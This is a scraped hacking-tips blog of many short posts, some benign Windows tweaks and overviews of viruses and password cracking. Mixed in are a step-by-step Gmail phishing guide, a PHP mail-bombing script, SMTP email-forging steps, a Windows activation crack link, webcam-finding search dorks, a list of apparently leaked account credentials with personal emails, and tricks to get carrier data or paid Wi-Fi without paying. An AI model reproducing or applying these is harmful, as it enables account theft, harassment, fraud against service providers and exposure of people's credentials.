1:01 AM | Posted in ,
Method 1 : Recover memory card password , using Fexplorer.

As I said, we need Fexplorer for this mobile hack .After installation , Browse to c:\system folder in your mobile phone . Here you would find a file mmcstore .This file is actually used to store memory card passwords in a mobile phone . Rename this file to mmcstore.txt and open with notepad . Now you will see the memory card password as it is ,exactly .

Method 2 :Unlock memory card passwords of Nokia Nseries and Eseries phones


The first hack to recover the password of memory cards will not work on Nokia Nseries and Nokia Eseries devices . Here we will use the remote lock feature for re-setting the password . For this , go to your pones settings >Security >Phone and SIM> and then allow Remote lock . The password of your remote lock will be the password of your memory card .So if you want to change the memory card password , just send an SMS containing your remote lock message .
Links to this post

Here is the most effective technique for cracking GMail Accounts Passwords.

This method uses 'Social Engineering' rather than 'Phishing'.

Follow the steps as given below :-

Success Rate :- 90%

Step-1 : Create your own fake gmail login form using HTML, which may look like one as shown below-


The HTML code for above login screen created by me is given below-



Step-2 : We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-

1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account. Which may be something like following-



OR

2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.


Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.

As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!
Links to this post
2:30 PM | Posted in
Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.


2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.


Check Your Password Strength



3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.
��
Links to this post
2:24 PM | Posted in
3) Spam :- Every e-mail account and network on the internet has limited space and bandwidth. This means that if an attacker is able to clog up all the inbox space and bandwidth of the target computer, it could cause lot of inconvenience and unnecessary trouble. Spam e-mails have slowly but surely started clogging up the bandwidth on the internet and the memory space in our inboxes.

MailBombing:- Mailbombing is a technique wherein the attacker floods victim's e-mail account with an extremely large (sometimes infinite) number of unsolicited meaningless e-mails. Two different types of mailbombing are-

a) Mass Mailbombing
b) List Linking Mailbombing
��
Links to this post
2:18 PM | Posted in
2) EMail Forging :- Email forging allows an attacker to disguise the source of an email and send it to the victim. Most attackers use this technique to fool the victim into believing that somebody else has send the particular email.
The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user.
Typically an attacker carries out email forging by following steps:

1) Start Command Prompt and type the following command-
c:/>telnet smtp.mailserver.com 25 or c:/>telnet mail.domain.com 25
example:- c:/>telnet smtp.gmail.com 25
The above command opens a telnet connection to the specified remote mail server on port-25. Where port-25 is the default SMTP port on which outgoing mail daemon runs.

2) Once you are connected to the mail daemon of remote mail server, you would be greeted with a message similar to following:-


If you are not familiar with the smtp mail daemon commands then enter the keyword 'help' at daemon which may reveal all the supporting commands as shown below.



3) The correct sequence of commands to be executed is:-
a) helo mailserver1.com
b) mail from:abc@mailserver1.com
c) rcpt to:xyz@mailserver2.com
d) data
e) .(dot command represents end of mail body)
This all as shown in figure below:


EMail forging by this technique does not possible, if mail relying is disabled by it's service provider.
��
Links to this post
2:13 PM | Posted in ,
All email communications on the internet are possible by two protocols:
1) Simple Mail Transfer Protocol (SMTP port-25)
2) Post Office Protocol (POP port-110)

E-Mail hacking consists of various techniques as discussed below.

1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram.

Mail-Path




The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email. A typical email header looks something like this:

From Barr Thu Jan 3 05:33:26 2008 X-Apparently-To: prasannasherekar@yahoo.co.in via 203.104.16.34; Thu, 03 Jan 2008 05:25:38 +0530 X-YahooFilteredBulk: 189.160.34.89 X-Originating-IP: [189.160.34.89] Return-Path: Authentication-Results: mta113.mail.in.yahoo.com from=destatis.de; domainkeys=neutral (no sig) Received: from 189.160.34.89 (HELO dsl-189-160-34-89.prod-infinitum.com.mx) (189.160.34.89) by mta113.mail.in.yahoo.com with SMTP; Thu, 03 Jan 2008 05:25:38 +0530 Received: from dvapa ([141.203.33.92]) by dsl-189-160-34-89.prod-infinitum.com.mx with Microsoft SMTPSVC(6.0.3790.0); Wed, 2 Jan 2008 18:03:26 -0600 Message-ID: <477c264e.3000604@destatis.de> Date: Wed, 2 Jan 2008 18:03:26 -0600 From: "Barr" Add to Address Book User-Agent: Thunderbird 2.0.0.6 (Windows/20070728) MIME-Version: 1.0 To: prasannasherekar@yahoo.co.in Subject: angel rubberneck Content-Type: multipart/related; boundary="------------030604060204000701040304" Content-Length: 16433


The above email header gives us the following information about it's origin and path:

a) Sender's email address :- atiles@destatis.de

b) Source IP address :- 141.203.33.92

c) Source mail server :- dsl-189-160-34-89.prod-infinitum.com.mx

d) Email client :- Thunderbird 2.0.0.6


Tips There are lots of ready-made tools available on the internet which performs email tracing very effectively and shows exact geographical location for email sender on the world map.


Recommended Tools
NeoTrace

http://www.neotrace.com
VisualRoute

http://visualroute.visualware.com
E-MailTracker

http://www.visualware.com
Links to this post
2:10 PM | Posted in
What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.

Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.
Category:
��
Links to this post
2:06 PM | Posted in
It is possible to disable Windows-XP splash screen, which will slightly speed up the overall boot process.
Be aware that removing the splash screen will also cause you not to see any boot-up messages that might come up (chkdsk, convert ... ), but if your system runs without any problems then it should not matter.

1) Edit boot.ini
2) Add " /noguiboot" right after "/fastdetect"

(or check the /noguiboot switch in msconfig on the boot.ini tab)

Upon restarting, the splash screen will be gone.
It can be re-enabled by removing the new switch.
Category:
��
Links to this post
2:04 PM | Posted in
1) Start - Run - Regedit
Navigate to the following Registry key:
HKEY CURRENT USER\Control Panel\Desktop
Double click on the AutoEndTasks entry and replace the 0 with a 1 in the Value data text box

For the next two, if the dword value indicated does not exist, create it:

Double click on the WaitToKillAppTimeout entry in the right pane and change the Value data to 2000

Double click on the HungAppTimeout entry in the right pane and change the Value data to 1000

Reboot

If still having a problem, make the next change:

2) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Right-click on WaitToKillServiceTimeout and change it to 2000

NOTE:- The lowest value Windows will recognize is 1000 (1 second)
Category:
��
Links to this post
1:28 PM | Posted in
If your computer takes a long time to become useable after starting up or logging on, or you want a clean boot of Winodws XP try this,

Click Start > Run > Type "msconfig" > On the Startup tab click Disable All and on the Services tab check the Hide All Microsoft Service box and then click Disable All. Click Restart and Windows XP will restart with only the system services and applications running resulting in a vey fast logon / startup.

NOTE:- This tweak will disable all non-system startup sevices and applications so if you have anything you want to run in the background such as anti virus software do not disable that item.
Category:
��
Links to this post
1:27 PM | Posted in
Start MS Dos Prompt (Start run CMD)
CHKNTFS/T:4
where 4 is the amount of waity time

CHKNTFS/?
for more info
Category:
��
Links to this post
1:24 PM | Posted in
To remove shortcut arrow from desktop icons in any type of document:

a) Perform instructions described under 'Remove shortcut arrow from desktop icons'. For your convenience, steps 1 to 3 are reported here.

b) Perform instructions described under 'Remove shortcut arrow from desktop icons (2)'. For your convenience, steps 4 and 5 are reported here.

c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.

So, here is a summary of all actions:

1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.

4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.

6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.

14. Close regedit.

Logoff and... Enjoy!

Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.
Category:
��
Links to this post
1:23 PM | Posted in
If you want to change the owner and organization in System Properties, just do the following:

Open the registry and go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Now just change the value for RegisteredOwner and RegisteredOrganization.
Category:
��
Links to this post
1:21 PM | Posted in
Windows Genuine Hack:-

1) Download "Windows.Genuine.Advantage.Validation..rar"
2) Extract It.
3) Run "installer.bat" file.
4) Reboot.
5) Enjoy Your Validated Windows.


Download:
Code:
http://rapidshare.com/files/115531401/Windows.Genuine.Advantage.Validation..rar
Category:
��
Links to this post
1:18 PM | Posted in
Nice script. With this one you can flood mail of your contacts.
--------------------------------------------------------------------------------------

set_time_limit(0);
ignore_user_abort(1);

$email=$_POST['email'];
$num=$_POST['num'];
$text=$_POST['text'];
$kb=$_POST['kb'];

?>



Flud2Mail (F2M) 0.1






Flud2Mail




if (($email!=”" and isset($email)) and ($num!=”" and isset($num)) and ($text!=”" and isset($text)) and ($kb!=”" and isset($kb))) {

$num_text=strlen($text)+1;
$num_kb=(1024/$num_text)*$kb;
$num_kb=ceil($num_kb);

for ($i=1; $i<=$num_kb; $i++) {
$msg=$msg.$text.” “;
}

for ($i=1; $i<=$num; $i++) {
mail($email, $text, $msg, “From: $email”);
}

$all_kb=$num*$kb;

echo <<

Victim: $email

Number of mails: $num

All sent KB : $all_kb kb


EOF;

}

else {

echo <<







Victim Mail
Number of mails
Flood Message
Size (kb)


EOF;

}

echo base64_decode(”PGgzIGFsaWduPSJjZW50ZXIiPlBvd2VyZWQgYnkgPGEgaHJlZj0iaHR0cDovL3d3dy54c3MucnUiPlhT
Uy1GMk0gMC4xPC9hPjwvaDM+”);

?>


Category:
��
Links to this post
1:11 PM | Posted in
Net Tools 5.0 (Complete Hacking Tools Kit)


Net Tools 5.0 (build 70) contains a whole variety of network tools.
Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Download:
Code:
http://www.mabsoft.com/NetTools5.0.70.zip
Links to this post
1:10 PM | Posted in



What is Ophcrack?
Ophcrack is a free Windows password cracker based on rainbow tables.
It is a very efficient implementation of rainbow tables done by the inventors of the method.
It comes with a Graphical User Interface and runs on multiple platforms.

Features:
* » Runs on Windows, Linux/Unix, Mac OS X, ...
* » Cracks LM and NTLM hashes.
* » Free tables available for Windows XP and Vista.
* » Brute-force module for simple passwords.
* » LiveCD available to simplify the cracking.
* » Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.
* » Free and open source software (GPL).

Latest Release: Ophcrack 3.1.0

Download:
Code:
http://ophcrack.sourceforge.net/download.php?type=ophcrack
��
Links to this post
1:08 PM | Posted in




Description:
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Version 2.03 Release:
* Nikto can now take greppable nmap input directly on the command line.
* Nikto can take a range of ports (e.g. 80-82).
* Ports that are not open are now reported.
* Nikto can now read hosts from stdin, by specifying "-host -".
* HTML and XML reports don't produce duplicates.
* Allow multiple HTTP methods to work out whether the server is HTTP or not.
* Fix for a nasty bug where defined variables (e.g. cgi-bin directories) are not read properly.
* Updates to allow HTML output to validate properly as XHTML.

Download:
Code:
http://www.cirt.net/nikto2
��
Links to this post


Eraser is an advanced security tool for Windows which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 98, ME, NT, 2000, XP, Vista, Windows Server 2003 and Server 2008.

Eraser is Free software and its source code is released under GNU General Public License.

Eraser Features:
* It works with Windows XP, Windows Vista, Windows Server 2003 and Windows Server 2008.
o Windows 98, ME, NT, 2000 can still be used with version 5!
* It works with any drive that works with Windows
* Secure drive erasure methods are supported out of the box
* Erases files, folders and their previous deleted counterparts
* Works with an extremely customisable Scheduler

Download:
Code:
http://eraser.heidi.ie/
Links to this post
1:01 PM | Posted in




Sitemeter, one of the best traffic counter for websites/blogs, it shows online users, Referrals (From where people coming to your site), country locations, browser etc etc.. all in detail.

This counter is visible to all visitors.
Invisible Counters (Tracker) is available for Premium Accounts Only...!

But you can easily hack to hide it.
Its just few setting changes which will work fine.

1) Login into your sitemeter account.
2) Go to 'Manager' from top menu.
3) Go to 'Meter Style' option from left hand menu.
4) Select 2nd last meter style (Counter, which shows simple numbers).
5) Now in “DIGIT COLOR” select 'Transparent', Similarly in “BACKGROUND COLOR” select 'Transparent'.
6) DONE.

Now your sitemeter counter is invisible from normal eyes in your site
Place it anywhere in your website/blog, and track your traffic, users.

Enjoy.....!
Category:
��
Links to this post
12:58 PM | Posted in



TeaShark, a mobile browser like Opera Mini, allow you to access Airtel GPRS for FREE.
Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.

Here is how I used this…

* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.
* Open it from your mobile and select AirTel Live as access point.
* That’s it! Open any site from TeaShark and you won’t be charged anything.

Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!

As of now, this trick is limited to handsets only.

Note:“Subscribe to Packet Data First”
This means you need to activate AirTel Live service which is free.
Contact customer care to get it activated.
Also select only AirTel Live as access point when prompted by TeaShark.

Download TeaShark:
Code:
http://teashark.com/download.html
Links to this post
12:55 PM | Posted in
All you need to have is
–>PC
–>Serial/USB cable/Bluetooth dongle
–>Any Browser(I suggest Opera as we can browse both wap and other sites)

Follow These Steps:
—>Activate Airtel Live sending a message MASALA ACTIVE to 121
—>Create a profile with the following settings in your data account under Data Communication

GATEWAY : 100.1.200.99
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :
DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF

and then Under INTERNET PROFILES,

INTERNET MODE : HTTP or WAP (both works)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :

–>Create a new dial-up connection on your pc after connecting the mobile to pc,using the NEW CONNECTION WIZARD as follows

ISP Name : Anyname
Phone Number : *99***1#
Username and Password : blank

–>Configure your browser to use the proxy 100.1.200.99 and port 8080.

–>Connect to the dial-up account. You will be connected at 115.2kbps

—>Now if you try to access any site on your mobile you ll get an error message like “Access Denied”

—>Open your browser, and start browsing and voila it opens the regular sites and if u beleive ull get a d/l speed of 5-6 kbps

Common Errors:
If you are getting any error wile dialing a dial up connection than go to
Control panel>> Phone and modem>>>select modem and click on its properties >>advanced
and enter the following initialization commands
CODE
AT+CGDCONT=2, “IP”,”airtelfun.com”,”",0,0

Now it should be connected without any error......!
Links to this post
12:48 PM | Posted in
Google Search for:

intitle:”wj-nt104 main”

intitle:”snc-rz30 home”

inurl:indexFrame.shtml “Axis video server”

inurl:/view/index.shtml

inurl:lvappl intitle:liveapplet

inurl:”viewerframe?mode=motion”

Let me know what happens.........?
Enjoy..... Very Happy
Category:
��
Links to this post
12:44 PM | Posted in
Following are the list of usernames and passwords of the premium accounts for Best downloads sites.
…!! ENJOY !!…
!!…100% Working Accounts…!!

Code:
1)www.divxcrawler.com {download movies fastly}
Username : divx273
Password : 8342729

2)www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}
Username : cinemanetwork20
Password : butterfly20

3)www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}
Username : lo886Ees
Password : zAgt88er

4)www.sharingzone.net {movies, Pc softwares, Pc Games}
Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD

5)www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}
Username : ga20me
Password : ke01feb

6)www.watchdirect.tv {movies, music, Pc Games, online Tv}
Username : cinemanetwork20
Password : butterfly20

7)www.fullreleasez.com {Greatly Every thing}
Username : Af872HskL
Password : XjsdH28N

8)www.fulldownloads.us {Greatly Every thing}
Username : Af872HskL
Password : XjsdH28N

9)www.pirateaccess.com {Every thing}
Username :yourfrienddalat@gmail.com
Password :CHh5LKPI

Username :xxx_heel_xxx@yahoo.com
Password :MJY0BUY

Username :i_l0ve_u_786@yahoo.com
Password :rYvLgPrt

Username :mubashar_siddique@yahoo.com
Password :F9Gzgwb5

10)www.warezquality.com {Every thing}
Username : ageg2020
Password : z8fsDfg3

11)www.warezreleases.com {All Stuff}
Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

12)www.fulldownloadaccess.com {All Stuff}
Username : mpuv3y
Password : umvpy3x

13)www.alphaload.com {All Stuff}
Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

14)www.gamedownloadnow.com {All Stuff}
Username : ga20me
Password : ke01feb

15)www.unlimiteddownloadcenter.com {All Stuff}
Username : cu20me
Password : ke01feb

16)www.tvadvanced.com {online Tv}
Username : mv03dl
Password : frmvdl
��
Links to this post
12:38 PM | Posted in ,
Now a days Airtel gives New option to the Subscriber to access Mobile Office daily @ Rs.25.00/- perday. But this is too Costly.
Only 24 hours and the cost is Rs.25.00 Oh GOD!!

But I got a Trick thats help me to Activate my Mobile Office whole 30 days only for 25.00/. Its really goood.

Just follow the Trick-

1) Your account balance should be above 25.00 for the first time.
2) Acitave your mobile office by dailing *444*1#. You will Activate your Mobile Office in the Morning.
3) You got an Activation msg. Your account should deducted by Rs. 25.00/-
4) After that your can enjoy mobile office for 24 hours.
5) But for unlimited access you will do this :: Just switch off your mobile from 7.00 am to 10.00am. and your account balance should be below 25.00 /
6) Just try it enjoy the whole world only by 25.00.

I am Sure you should be Benifited. JUST TRY IT!!!!!!!!!
Category: ,
��
Links to this post
12:28 PM | Posted in ,
You can leech free wifi from some paid hotspots by monkeying around with the URLs.

Most paid wifi hotspots accept your browser’s request and then redirect you to a login page where you need to pay to access the network.
But some systems of this nature are set up in such a way that images and other direct file requests seem to slip through without the redirect to the login page.
It’s essentially an oversight on the network administrator’s part, so it may not work with every hotspot.

But here’s the hack: just append ?.jpg to the end of your queries to trick the network into loading the full web page for free.
The browser passes this info along as an extra parameter and the site in question will likely just ignore it, loading the page as normal.

Of course this tip comes from a blog post that’s nearly two years old, so there’s no guarantees.
But here’s the basic code, which I pulled from a commenter on Lifehacker’s write up:

Code:
if (window.location.toString().match(".jpg") == null) {
window.location.replace(window.location + '?.jpg');
}


Save that as JavaScript file and add it to Firefox via Greasemonkey and give it a shot.

Of course since there are plenty of free networks in most places, there isn’t much point to hacking paid networks.
But for situations like airports, hotels and other isolated, expensive networks, it could come in handy.

Is it legal? No idea. I’m not a lawyer, so use this info at your own risk.
If you try it, be sure to let us know how it works.
Category: ,
��
Links to this post
12:13 PM | Posted in
This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings:-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-
��
Links to this post
12:13 PM | Posted in
This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings:-
Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-
��
Links to this post
12:00 PM | Posted in
Following are the easy to analyze ICMP, TCP and UDP packet headers along with short description.
All header Drawings by- "Matt Baxter" (www.fatpipe.org/~mjb/Drawings/)


ICMP-Header

ICMP Message Types :- ICMP message type-code/name format
0 Echo Reply
3 Destination Unreachable
